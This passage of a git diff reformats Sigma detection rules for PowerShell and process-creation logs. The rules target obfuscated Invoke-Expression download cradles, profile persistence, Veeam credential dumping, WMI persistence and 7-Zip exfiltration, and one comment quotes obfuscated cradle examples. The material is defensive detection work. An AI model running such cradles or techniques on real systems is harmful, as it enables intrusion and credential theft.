'Adversaries may modify file time attributes to hide new or changes to - existing files. - - Timestomping is a technique that modifies the timestamps of a file (the modify, - access, create, and change times), often to mimic files that are in the same folder. - - ' +description: | + Adversaries may modify file time attributes to hide new or changes to existing files. + Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md - https://www.offensive-security.com/metasploit-unleashed/timestomp/ diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_token_obfuscation.yml b/sigma/builtin/powershell/powershell_script/posh_ps_token_obfuscation.yml index 196b1e6de..2b148d2a4 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_token_obfuscation.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_token_obfuscation.yml @@ -1,8 +1,8 @@ title: Powershell Token Obfuscation - Powershell id: f3a98ce4-6164-4dd4-867c-4d83de7eca51 related: - - id: deb9b646-a508-44ee-b7c9-d8965921c6b6 - type: similar + - id: deb9b646-a508-44ee-b7c9-d8965921c6b6 + type: similar status: experimental description: Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation references: @@ -24,13 +24,19 @@ detection: - Microsoft-Windows-PowerShell/Operational - PowerShellCore/Operational selection: - - ScriptBlockText|re: \w+`(\w+|-|.)`[\w+|\s] - - ScriptBlockText|re: '"(\{\d\}){2,}"\s*-f' - - ScriptBlockText|re: \$\{((e|n|v)*`(e|n|v)*)+:path\}|\$\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\}|\$\{env:((p|a|t|h)*`(p|a|t|h)*)+\} + # Examples: + # IN`V`o`Ke-eXp`ResSIOn (Ne`W-ob`ject Net.WebClient).DownloadString + # &('In'+'voke-Expressi'+'o'+'n') (.('New-Ob'+'jec'+'t') Net.WebClient).DownloadString + # &("{2}{3}{0}{4}{1}"-f 'e','Expression','I','nvok','-') (&("{0}{1}{2}"-f'N','ew-O','bject') Net.WebClient).DownloadString + # ${e`Nv:pATh} + - ScriptBlockText|re: \w+`(\w+|-|.)`[\w+|\s] + # - ScriptBlockText|re: '\((\'(\w|-|\.)+\'\+)+\'(\w|-|\.)+\'\)' TODO: fixme + - ScriptBlockText|re: '"(\{\d\}){2,}"\s*-f' # trigger on at least two placeholders. One might be used for legitimate string formatting + - ScriptBlockText|re: \$\{((e|n|v)*`(e|n|v)*)+:path\}|\$\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\}|\$\{env:((p|a|t|h)*`(p|a|t|h)*)+\} filter_chocolatey: ScriptBlockText|contains: - - it will return true or false instead - - The function also prevents `Get-ItemProperty` from failing + - it will return true or false instead # Chocolatey install script https://github.com/chocolatey/chocolatey + - The function also prevents `Get-ItemProperty` from failing # https://docs.chocolatey.org/en-us/create/functions/get-uninstallregistrykey filter_exchange: Path|startswith: C:\Program Files\Microsoft\Exchange Server\ Path|endswith: \bin\servicecontrol.ps1 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml b/sigma/builtin/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml index 43e518fc4..2ee5f1b30 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml @@ -1,11 +1,10 @@ title: User Discovery And Export Via Get-ADUser Cmdlet - PowerShell id: c2993223-6da8-4b1a-88ee-668b8bf315e9 related: - - id: 1114e048-b69c-4f41-bc20-657245ae6e3f - type: similar + - id: 1114e048-b69c-4f41-bc20-657245ae6e3f + type: similar status: test -description: Detects usage of the Get-ADUser cmdlet to collect user information and - output it to a file +description: Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file references: - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/ @@ -36,7 +35,6 @@ detection: - Add-Content condition: ps_script and selection falsepositives: - - Legitimate admin scripts may use the same technique, it's better to exclude - specific computers or users who execute these commands or scripts often + - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often level: medium ruletype: Sigma diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_user_profile_tampering.yml b/sigma/builtin/powershell/powershell_script/posh_ps_user_profile_tampering.yml index e7e1a0c5b..6e0079029 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_user_profile_tampering.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_user_profile_tampering.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via PowerShell User Profile Using Add-Content id: 05b3e303-faf0-4f4a-9b30-46cc13e69152 status: test -description: Detects calls to "Add-Content" cmdlet in order to modify the content - of the user profile and potentially adding suspicious commands for persistence +description: Detects calls to "Add-Content" cmdlet in order to modify the content of the user profile and potentially adding suspicious commands for persistence references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.013/T1546.013.md author: frack113, Nasreddine Bencherchali (Nextron Systems) @@ -26,17 +25,17 @@ detection: ScriptBlockText|contains: Add-Content $profile selection_options: ScriptBlockText|contains: + # Note: You can add more suspicious values - '-Value "IEX ' - -Value "Invoke-Expression - -Value "Invoke-WebRequest - -Value "Start-Process - - '-Value ''IEX ' + - "-Value 'IEX " - -Value 'Invoke-Expression - -Value 'Invoke-WebRequest - -Value 'Start-Process condition: ps_script and (all of selection_*) falsepositives: - - Legitimate administration and tuning scripts that aim to add functionality to - a user PowerShell session + - Legitimate administration and tuning scripts that aim to add functionality to a user PowerShell session level: medium ruletype: Sigma diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml b/sigma/builtin/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml index 2984eed52..d13e42d9d 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml @@ -1,12 +1,10 @@ title: Abuse of Service Permissions to Hide Services Via Set-Service - PS id: 953945c5-22fe-4a92-9f8a-a9edc1e522da related: - - id: 514e4c3a-c77d-4cde-a00f-046425e2301e - type: similar + - id: 514e4c3a-c77d-4cde-a00f-046425e2301e + type: similar status: test -description: Detects usage of the "Set-Service" powershell cmdlet to configure a new - SecurityDescriptor that allows a service to be hidden from other utilities such - as "sc.exe", "Get-Service"...etc. (Works only in powershell 7) +description: Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7) references: - https://twitter.com/Alh4zr3d/status/1580925761996828672 - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_veeam_credential_dumping_script.yml b/sigma/builtin/powershell/powershell_script/posh_ps_veeam_credential_dumping_script.yml index 5515ac78a..bb6f0d974 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_veeam_credential_dumping_script.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_veeam_credential_dumping_script.yml @@ -1,8 +1,7 @@ title: Veeam Backup Servers Credential Dumping Script Execution id: 976d6e6f-a04b-4900-9713-0134a353e38b status: experimental -description: Detects execution of a PowerShell script that contains calls to the "Veeam.Backup" - class, in order to dump stored credentials. +description: Detects execution of a PowerShell script that contains calls to the "Veeam.Backup" class, in order to dump stored credentials. references: - https://www.pwndefend.com/2021/02/15/retrieving-passwords-from-veeam-backup-servers/ - https://labs.withsecure.com/publications/fin7-target-veeam-servers diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml b/sigma/builtin/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml index 5992c2450..f20f7c683 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml @@ -1,12 +1,10 @@ title: Usage Of Web Request Commands And Cmdlets - ScriptBlock id: 1139d2e2-84b1-4226-b445-354492eba8ba related: - - id: 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d - type: derived + - id: 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d + type: derived status: test -description: Detects the use of various web request commands with commandline tools - and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock - logs +description: Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs references: - https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/ - https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_win32_nteventlogfile_usage.yml b/sigma/builtin/powershell/powershell_script/posh_ps_win32_nteventlogfile_usage.yml index 934ce8f3b..8502678be 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_win32_nteventlogfile_usage.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_win32_nteventlogfile_usage.yml @@ -1,8 +1,7 @@ title: Potentially Suspicious Call To Win32_NTEventlogFile Class - PSScript id: e2812b49-bae0-4b21-b366-7c142eafcde2 status: experimental -description: Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially - suspicious way (delete, backup, change permissions, etc.) from a PowerShell script +description: Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script references: - https://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa394225(v=vs.85) author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_win32_product_install_msi.yml b/sigma/builtin/powershell/powershell_script/posh_ps_win32_product_install_msi.yml index ac1748626..bb058ed43 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_win32_product_install_msi.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_win32_product_install_msi.yml @@ -1,8 +1,7 @@ title: PowerShell WMI Win32_Product Install MSI id: 91109523-17f0-4248-a800-f81d9e7c081d status: test -description: Detects the execution of an MSI file using PowerShell and the WMI Win32_Product - class +description: Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_win_api_susp_access.yml b/sigma/builtin/powershell/powershell_script/posh_ps_win_api_susp_access.yml index dfd3243b0..44191d112 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_win_api_susp_access.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_win_api_susp_access.yml @@ -1,8 +1,8 @@ title: Potential WinAPI Calls Via PowerShell Scripts id: 03d83090-8cba-44a0-b02f-0b756a050306 related: - - id: ba3f5c1b-6272-4119-9dbd-0bc8d21c2702 - type: similar + - id: ba3f5c1b-6272-4119-9dbd-0bc8d21c2702 + type: similar status: experimental description: Detects use of WinAPI functions in PowerShell scripts references: @@ -19,6 +19,7 @@ logsource: category: ps_script definition: 'Requirements: Script Block Logging must be enabled' detection: + # Note: Add more suspicious combinations in the form of different selections ps_script: EventID: 4104 Channel: diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_win_defender_exclusions_added.yml b/sigma/builtin/powershell/powershell_script/posh_ps_win_defender_exclusions_added.yml index 652b2a605..75c1ef1ea 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_win_defender_exclusions_added.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_win_defender_exclusions_added.yml @@ -1,11 +1,10 @@ title: Windows Defender Exclusions Added - PowerShell id: c1344fa2-323b-4d2e-9176-84b4d4821c88 related: - - id: 17769c90-230e-488b-a463-e05c08e9d48f - type: similar + - id: 17769c90-230e-488b-a463-e05c08e9d48f + type: similar status: test -description: Detects modifications to the Windows Defender configuration settings - using PowerShell to add exclusions +description: Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions references: - https://www.elastic.co/guide/en/security/current/windows-defender-exclusions-added-via-powershell.html author: Tim Rauch diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml b/sigma/builtin/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml index 55f6e8587..941d72b5c 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml @@ -1,11 +1,10 @@ title: Windows Firewall Profile Disabled id: 488b44e7-3781-4a71-888d-c95abfacf44d related: - - id: 12f6b752-042d-483e-bf9c-915a6d06ad75 - type: similar + - id: 12f6b752-042d-483e-bf9c-915a6d06ad75 + type: similar status: test -description: Detects when a user disables the Windows Firewall via a Profile to help - evade defense. +description: Detects when a user disables the Windows Firewall via a Profile to help evade defense. references: - https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps - https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_winlogon_helper_dll.yml b/sigma/builtin/powershell/powershell_script/posh_ps_winlogon_helper_dll.yml index db4424043..ed3b06e73 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_winlogon_helper_dll.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_winlogon_helper_dll.yml @@ -1,18 +1,11 @@ title: Winlogon Helper DLL id: 851c506b-6b7c-4ce2-8802-c703009d03c0 status: test -description: 'Winlogon.exe is a Windows component responsible for actions at logon/logoff - as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. - - Registry entries in HKLM\Software[Wow6432Node]Microsoft\Windows NT\CurrentVersion\Winlogon\ - and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are - - used to manage additional helper programs and functionalities that support Winlogon. - Malicious modifications to these Registry keys may cause Winlogon to - +description: | + Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. + Registry entries in HKLM\Software[Wow6432Node]Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are + used to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. - - ' references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md author: Timur Zinniatullin, oscd.community diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_wmi_persistence.yml b/sigma/builtin/powershell/powershell_script/posh_ps_wmi_persistence.yml index 787f0b9ae..6487e3410 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_wmi_persistence.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_wmi_persistence.yml @@ -1,9 +1,7 @@ title: Powershell WMI Persistence id: 9e07f6e7-83aa-45c6-998e-0af26efd0a85 status: test -description: Adversaries may establish persistence and elevate privileges by executing - malicious content triggered by a Windows Management Instrumentation (WMI) event - subscription. +description: Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md - https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545 @@ -24,16 +22,16 @@ detection: - Microsoft-Windows-PowerShell/Operational - PowerShellCore/Operational selection_ioc: - - ScriptBlockText|contains|all: - - 'New-CimInstance ' - - '-Namespace root/subscription ' - - '-ClassName __EventFilter ' - - '-Property ' - - ScriptBlockText|contains|all: - - 'New-CimInstance ' - - '-Namespace root/subscription ' - - '-ClassName CommandLineEventConsumer ' - - '-Property ' + - ScriptBlockText|contains|all: + - 'New-CimInstance ' + - '-Namespace root/subscription ' + - '-ClassName __EventFilter ' + - '-Property ' # is a variable name + - ScriptBlockText|contains|all: + - 'New-CimInstance ' + - '-Namespace root/subscription ' + - '-ClassName CommandLineEventConsumer ' + - '-Property ' # is a variable name condition: ps_script and selection_ioc falsepositives: - Unknown diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml b/sigma/builtin/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml index 37f65d77f..1de5c48fd 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml @@ -1,11 +1,10 @@ title: WMIC Unquoted Services Path Lookup - PowerShell id: 09658312-bc27-4a3b-91c5-e49ab9046d1b related: - - id: 68bcd73b-37ef-49cb-95fc-edc809730be6 - type: similar + - id: 68bcd73b-37ef-49cb-95fc-edc809730be6 + type: similar status: test -description: Detects known WMI recon method to look for unquoted service paths, often - used by pentest inside of powershell scripts attackers enum scripts +description: Detects known WMI recon method to look for unquoted service paths, often used by pentest inside of powershell scripts attackers enum scripts references: - https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py - https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_wmimplant.yml b/sigma/builtin/powershell/powershell_script/posh_ps_wmimplant.yml index c1da1525e..eac7f5afd 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_wmimplant.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_wmimplant.yml @@ -36,8 +36,11 @@ detection: - ' sched_job ' - ' service_mod ' - ' process_kill ' + # - ' process_start ' - ' active_users ' - ' basic_info ' + # - ' drive_list ' + # - ' installed_programs ' - ' power_off ' - ' vacant_system ' - ' logon_events ' diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_x509enrollment.yml b/sigma/builtin/powershell/powershell_script/posh_ps_x509enrollment.yml index b479519bc..7527535c9 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_x509enrollment.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_x509enrollment.yml @@ -1,8 +1,8 @@ title: Suspicious X509Enrollment - Ps Script id: 504d63cb-0dba-4d02-8531-e72981aace2c related: - - id: 114de787-4eb2-48cc-abdb-c0b449f93ea4 - type: similar + - id: 114de787-4eb2-48cc-abdb-c0b449f93ea4 + type: similar status: test description: Detect use of X509Enrollment references: diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_xml_iex.yml b/sigma/builtin/powershell/powershell_script/posh_ps_xml_iex.yml index ec627417c..ea7e0dce1 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_xml_iex.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_xml_iex.yml @@ -1,15 +1,10 @@ title: Powershell XML Execute Command id: 6c6c6282-7671-4fe9-a0ce-a2dcebdc342b status: test -description: 'Adversaries may abuse PowerShell commands and scripts for execution. - - PowerShell is a powerful interactive command-line interface and scripting environment - included in the Windows operating system. (Citation: TechNet PowerShell) - - Adversaries can use PowerShell to perform a number of actions, including discovery - of information and execution of code - - ' +description: | + Adversaries may abuse PowerShell commands and scripts for execution. + PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) + Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-8---powershell-xml-requests author: frack113 diff --git a/sigma/builtin/process_creation/proc_creation_win_7zip_exfil_dmp_files.yml b/sigma/builtin/process_creation/proc_creation_win_7zip_exfil_dmp_files.yml index 1b8ffb057..c336ff127 100644 --- a/sigma/builtin/process_creation/proc_creation_win_7zip_exfil_dmp_files.yml +++ b/sigma/builtin/process_creation/proc_creation_win_7zip_exfil_dmp_files.yml @@ -1,11 +1,10 @@ title: 7Zip Compressing Dump Files id: ec570e53-4c76-45a9-804d-dc3f355ff7a7 related: - - id: 1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc - type: derived + - id: 1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc + type: derived status: experimental -description: Detects execution of 7z in order to compress a file with a ".dmp"/".dump" - extension, which could be a step in a process of dump file exfiltration. +description: Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration. references: - https://thedfirreport.com/2022/09/26/bumblebee-round-two/ author: Nasreddine Bencherchali (Nextron Systems) @@ -22,23 +21,22 @@ detection: EventID: 4688 Channel: Security selection_img: - - Description|contains: 7-Zip - - NewProcessName|endswith: - - \7z.exe - - \7zr.exe - - \7za.exe - - OriginalFileName: - - 7z.exe - - 7za.exe + - Description|contains: 7-Zip + - NewProcessName|endswith: + - \7z.exe + - \7zr.exe + - \7za.exe + - OriginalFileName: + - 7z.exe + - 7za.exe selection_extension: - CommandLine|contains: + CommandLine|contains: - .dmp - .dump - .hdmp condition: process_creation and (all of selection_*) falsepositives: - - Legitimate use of 7z with a command line in which ".dmp" or ".dump" appears - accidentally + - Legitimate use of 7z with a command line in which ".dmp" or ".dump" appears accidentally - Legitimate use of 7z to compress WER ".dmp" files for troubleshooting level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_7zip_password_compression.yml b/sigma/builtin/process_creation/proc_creation_win_7zip_password_compression.yml index 9e5854195..2c4af5a72 100644 --- a/sigma/builtin/process_creation/proc_creation_win_7zip_password_compression.yml +++ b/sigma/builtin/process_creation/proc_creation_win_7zip_password_compression.yml @@ -1,8 +1,7 @@ title: Compress Data and Lock With Password for Exfiltration With 7-ZIP id: 9fbf5927-5261-4284-a71d-f681029ea574 status: test -description: An adversary may compress or encrypt data that is collected prior to - exfiltration using 3rd party utilities +description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md author: frack113 @@ -19,18 +18,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - Description|contains: 7-Zip - - NewProcessName|endswith: - - \7z.exe - - \7zr.exe - - \7za.exe - - OriginalFileName: - - 7z.exe - - 7za.exe + - Description|contains: 7-Zip + - NewProcessName|endswith: + - \7z.exe + - \7zr.exe + - \7za.exe + - OriginalFileName: + - 7z.exe + - 7za.exe selection_password: - CommandLine|contains: ' -p' + CommandLine|contains: ' -p' selection_action: - CommandLine|contains: + CommandLine|contains: - ' a ' - ' u ' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_7zip_password_extraction.yml b/sigma/builtin/process_creation/proc_creation_win_7zip_password_extraction.yml index 3a5b50f8f..641726b23 100644 --- a/sigma/builtin/process_creation/proc_creation_win_7zip_password_extraction.yml +++ b/sigma/builtin/process_creation/proc_creation_win_7zip_password_extraction.yml @@ -1,8 +1,7 @@ title: Password Protected Compressed File Extraction Via 7Zip id: b717b8fd-6467-4d7d-b3d3-27f9a463af77 status: experimental -description: Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract - password protected zip files. +description: Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files. references: - https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/ author: Nasreddine Bencherchali (Nextron Systems) @@ -18,22 +17,21 @@ detection: EventID: 4688 Channel: Security selection_img: - - Description|contains: 7-Zip - - NewProcessName|endswith: - - \7z.exe - - \7zr.exe - - \7za.exe - - OriginalFileName: - - 7z.exe - - 7za.exe + - Description|contains: 7-Zip + - NewProcessName|endswith: + - \7z.exe + - \7zr.exe + - \7za.exe + - OriginalFileName: + - 7z.exe + - 7za.exe selection_password: - CommandLine|contains|all: + CommandLine|contains|all: - ' -p' - ' x ' - ' -o' condition: process_creation and (all of selection_*) falsepositives: - - Legitimate activity is expected since extracting files with a password can be - common in some environment. + - Legitimate activity is expected since extracting files with a password can be common in some environment. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml b/sigma/builtin/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml index cdde24563..3341d7831 100644 --- a/sigma/builtin/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml +++ b/sigma/builtin/process_creation/proc_creation_win_addinutil_suspicious_cmdline.yml @@ -1,16 +1,11 @@ title: Suspicious AddinUtil.EXE CommandLine Execution id: 631b22a4-70f4-4e2f-9ea8-42f84d9df6d8 status: experimental -description: 'Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) - with suspicious Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe - with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store - payload. - - ' +description: | + Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with suspicious Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload. references: - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html -author: Nasreddine Bencherchali (Nextron Systems), Michael McKinley (@McKinleyMike), - Tony Latteri (@TheLatteri) +author: Nasreddine Bencherchali (Nextron Systems), Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) date: 2023/09/18 tags: - attack.defense_evasion @@ -23,21 +18,21 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \addinutil.exe - - OriginalFileName: AddInUtil.exe + - NewProcessName|endswith: \addinutil.exe + - OriginalFileName: AddInUtil.exe selection_susp_1_flags: - CommandLine|contains: + CommandLine|contains: - '-AddInRoot:' - '-PipelineRoot:' selection_susp_1_paths: - CommandLine|contains: + CommandLine|contains: - \AppData\Local\Temp\ - \Desktop\ - \Downloads\ - \Users\Public\ - \Windows\Temp\ selection_susp_2: - CommandLine|contains: + CommandLine|contains: - -AddInRoot:. - -AddInRoot:"." - -PipelineRoot:. @@ -48,8 +43,7 @@ detection: - \Downloads\ - \Users\Public\ - \Windows\Temp\ - condition: process_creation and (selection_img and (all of selection_susp_1_* - or selection_susp_2)) + condition: process_creation and (selection_img and (all of selection_susp_1_* or selection_susp_2)) falsepositives: - Unknown level: high diff --git a/sigma/builtin/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml index 472e37d8c..dab4613a7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_addinutil_uncommon_child_process.yml @@ -1,11 +1,8 @@ title: Uncommon Child Process Of AddinUtil.EXE id: b5746143-59d6-4603-8d06-acbd60e166ee status: experimental -description: 'Detects uncommon child processes of the Add-In deployment cache updating - utility (AddInutil.exe) which could be a sign of potential abuse of the binary - to proxy execution via a custom Addins.Store payload. - - ' +description: | + Detects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload. references: - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) @@ -23,7 +20,7 @@ detection: selection: ParentProcessName|endswith: \addinutil.exe filter_main_werfault: - NewProcessName|endswith: + NewProcessName|endswith: - :\Windows\System32\conhost.exe - :\Windows\System32\werfault.exe - :\Windows\SysWOW64\werfault.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml b/sigma/builtin/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml index a95cd947c..1389e206f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml +++ b/sigma/builtin/process_creation/proc_creation_win_addinutil_uncommon_cmdline.yml @@ -1,12 +1,8 @@ title: Uncommon AddinUtil.EXE CommandLine Execution id: 4f2cd9b6-4a17-440f-bb2a-687abb65993a status: experimental -description: 'Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) - with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe - with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store - payload. - - ' +description: | + Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload. references: - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri) @@ -22,14 +18,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \addinutil.exe - - OriginalFileName: AddInUtil.exe + - NewProcessName|endswith: \addinutil.exe + - OriginalFileName: AddInUtil.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - '-AddInRoot:' - '-PipelineRoot:' filter_main_addinroot: - CommandLine|contains: + CommandLine|contains: - -AddInRoot:"C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA - -AddInRoot:C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA - -PipelineRoot:"C:\Program Files (x86)\Common Files\Microsoft Shared\VSTA diff --git 